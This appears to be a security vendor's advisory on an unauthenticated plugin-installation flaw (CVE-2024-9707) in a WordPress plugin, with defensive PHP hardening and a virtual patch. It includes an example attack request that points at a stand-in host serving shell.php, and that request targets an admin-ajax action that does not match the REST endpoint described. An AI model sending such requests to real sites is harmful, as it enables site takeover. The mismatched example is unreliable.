[2025.03 Vulnerability Report] HUNK COMPANION Plugin Remote Code Execution (CVE-2024-9707)
1. Overview
Hunk Companion is a WordPress plugin that bundles the features needed to build a website. We analyzed it for CVE-2024-9707, an RCE vulnerability found in the plugin.
Source: https://www.bleepingcomputer.com/news/security/hunk-companion-wordpress-plugin-exploited-to-install-vulnerable-plugins/
2. Attack Type
CVE-2024-9707 affects all versions of the Hunk Companion plugin for WordPress up to and including 1.8.4. The /wp-json/hc/v1/themehunk-import REST API endpoint lacks a capability (authorization) check, so it permits unauthorized plugin installation and activation. An unauthenticated attacker could therefore install and activate arbitrary plugins, and once a plugin with a known vulnerability has been installed and activated, that could be leveraged to achieve remote code execution.
Attack Methods:
- The attacker sends a crafted HTTP request to the /wp-json/hc/v1/themehunk-import endpoint.
- Because the endpoint performs no capability check, the request is processed without verifying the caller's authentication or permissions.
- The plugin specified in the request is installed and activated on the target WordPress instance.
Example attack syntax:
POST /wp-admin/admin-ajax.php?action=hunk_companion_import HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: ...
content={"file_url":"http://evil.com/shell.php"}
3. Response
CVE-2024-9707 is fixed in Hunk Companion 1.8.5; sites should update to 1.8.5 or later.
The vulnerability is exploited through a crafted HTTP request to the /wp-json/hc/v1/themehunk-import endpoint.
We are analyzing it further and will respond with a detection pattern in our AIWAF product.
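The defect class described above, shown in WordPress REST terms as an added example (not Hunk Companion's own code): a privileged route whose permission_callback admits every caller, beside the hardened registration that requires the install_plugins capability, plus a mu-plugin virtual patch a site owner can deploy until the plugin is updated. The callback function name is assumed for illustration.

```php
<?php
// Added example, not the plugin's code. The weak pattern behind a
// "missing capability check" on a REST route looks like this:
//
//     'permission_callback' => '__return_true',   // anyone may call it
//
// With that setting, an unauthenticated POST reaches the install logic.

// HARDENED registration: the permission_callback gates the route on the
// same capability WordPress core requires for installing plugins. REST
// cookie auth already drops the user to 0 when the X-WP-Nonce is missing
// or invalid, so this check also covers CSRF against logged-in admins.
add_action('rest_api_init', function () {
    register_rest_route('hc/v1', '/themehunk-import', [
        'methods'             => 'POST',
        'callback'            => 'example_themehunk_import', // assumed name
        'permission_callback' => function () {
            return current_user_can('install_plugins');
        },
    ]);
});

// VIRTUAL PATCH: drop this file into wp-content/mu-plugins/ to deny the
// vulnerable route to anyone lacking install_plugins, regardless of what
// the plugin's own permission_callback says. Remove after updating to 1.8.5+.
add_filter('rest_request_before_callbacks', function ($response, $handler, $request) {
    if ($request->get_route() === '/hc/v1/themehunk-import'
        && !current_user_can('install_plugins')) {
        return new WP_Error(
            'rest_forbidden',
            'Insufficient permissions.',
            ['status' => 403]
        );
    }
    return $response; // leave every other route untouched
}, 10, 3);
```

Returning a WP_Error from rest_request_before_callbacks short-circuits the request before the route's callback runs, so the 403 is the only effect on unauthorized callers.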
4. Conclusion
This critical vulnerability in the Hunk Companion plugin could be the first step in a broader exploitation chain. If other plugins with known vulnerabilities are enabled through this flaw, an attacker could achieve remote code execution on a WordPress site.
The widespread distribution of WordPress, the popularity of ThemeHunk themes, and the critical nature of the flaw combine to make this a serious security risk.
This vulnerability highlights the importance of conducting proper security reviews and implementing strong authentication and authorization checks within software components. The broad impact and ease of exploitation make this a serious threat that requires immediate attention and remediation.
Our AIWAF product is responding to vulnerabilities in various plugins by developing patterns and will continue to respond to related vulnerabilities as they are discovered.